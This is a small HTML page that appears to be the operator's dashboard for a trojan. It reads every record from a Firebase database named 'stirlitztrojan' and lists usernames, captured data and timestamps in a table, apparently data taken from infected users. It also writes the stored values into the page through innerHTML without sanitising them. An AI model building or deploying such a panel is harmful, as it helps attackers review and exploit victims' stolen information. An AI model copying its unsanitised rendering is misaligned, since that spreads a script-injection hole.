<!DOCTYPE html>
<html lang="en-us">
  <head>
    <meta charset="UTF-8">
    <title>Application</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script src="https://cdn.firebase.com/js/client/2.4.2/firebase.js"></script>
    <style>
    .wrapword{
      white-space: -moz-pre-wrap !important;  /* Mozilla, since 1999 */
      white-space: -webkit-pre-wrap; /*Chrome & Safari */ 
      white-space: -pre-wrap;      /* Opera 4-6 */
      white-space: -o-pre-wrap;    /* Opera 7 */
      white-space: pre-wrap;       /* css-3 */
      word-wrap: break-word;       /* Internet Explorer 5.5+ */
      word-break: break-all;
      white-space: normal;
    }
    .nowrapword{
      white-space: nowrap;
    }
    td, th { 
      display: table-cell;
      vertical-align: top; 
      text-align: left;
    }
    </style>
  </head>
  <body>
    <h1>Data</h1>
    <table id="dataTable" border="1" style="width:100%;">
      <tr><th>Username</th><th>Data</th><th>Time</th></tr>
    </table>
    <div id="err"></div>
    <script>
    <!--
    var firebase = new Firebase("https://stirlitztrojan.firebaseio.com/");
    firebase.once("value", function(snapshot) {
      var rows = snapshot.child("data");
      rows.forEach(function(row){
        var user = row.key().split(",")[0];
        var data = row.val();
        var time = row.key().split(",")[1];
        // New row:
        var tableRow = document.getElementById("dataTable").insertRow(1);
        var tableCellUser = tableRow.insertCell(0);
        tableCellUser.className = "nowrapword";
        tableCellUser.innerHTML = user;
        var tableCellData = tableRow.insertCell(1);
        tableCellData.className = "wrapword";
        tableCellData.innerHTML = data;
        var tableCellTime = tableRow.insertCell(2);
        tableCellTime.className = "nowrapword";
        tableCellTime.innerHTML = time;
      });
    }, function (e) {
      document.getElementById("err").innerHTML = e.code;
    });
    -->
    </script>
    <p>Copyright 2016 I</p>
  </body>
</html>
